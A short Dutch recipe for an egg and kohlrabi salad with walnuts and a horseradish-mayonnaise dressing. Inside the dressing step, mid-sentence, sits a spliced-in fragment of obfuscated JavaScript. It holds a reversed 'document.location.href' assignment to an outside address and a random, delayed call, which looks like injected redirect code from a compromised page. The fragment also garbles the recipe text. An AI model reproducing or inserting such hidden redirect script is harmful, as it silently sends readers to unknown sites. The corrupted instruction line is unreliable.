Ingrediënten: 2 personen
- 5 hard gekookte eiren
- 2 kleine koolrabi’s, geschild en in blokjes
- 1/2 rode paprika, in blokjes
- 1 rode Spaanse chilipeper, fijngesneden
- 50 g walnoten, grofgehakt
Voor de dressing:
- 3 el mayonnaise (suikervrij)
- 2 tl geraspte mierikswortel
- 1el appelciderazijn
Voor serveren:
- fijngeknipte bieslook
- grofgehakte walnoten
Bereiding:
- Snij de eiren in stukjes en meng met de overige ingrediënten.
- Meng de ingrediënten voor de dressing en voeg peper en zout naar smaak tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toe. Schenk de dressing over de salade en schep door elkaar.
- Bestrooi voor serveren met de bieslook en de walnoten.